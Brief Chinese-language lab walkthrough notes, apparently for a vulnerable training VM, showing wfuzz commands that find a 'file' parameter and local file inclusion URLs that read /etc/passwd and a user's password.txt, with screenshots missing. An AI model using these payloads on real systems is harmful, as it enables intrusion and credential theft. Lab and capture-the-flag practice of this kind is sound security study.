一、fuzz功能

1、目录扫描
2、密码爆破
3、找参数
4、压力测试
。。。

二、测试index.php的参数

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.182.129/index.php?FUZZ
image.png

三、过滤12个Word的结果

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt —hw 12 http://192.168.182.129/index.php?FUZZ
image.png
从结果得出参数为file的文件包含漏洞。

四、从第三步得到index.php的参数为file

http://192.168.142.138/index.php?file=???
将目录扫描出来的secret.txt文件中的location.txt放到file参数当中去
image.png

五、得到另一个页面的参数secrettier360

http://192.168.142.138/index.php?file=location.txt
image.png

六、尝试访问linux的密码文件/etc/passwd

http://192.168.182.129/image.php?secrettier360=/etc/passwd
image.png

七、用curl查看格式化的结果

curl http://192.168.182.129/image.php?secrettier360=/etc/passwd
image.png
http://192.168.182.129/image.php?secrettier360=/home/saket/password.txt

image.png

八、wordpress

http://192.168.182.129/wordpress
后续转7.wpscan扫描wordpress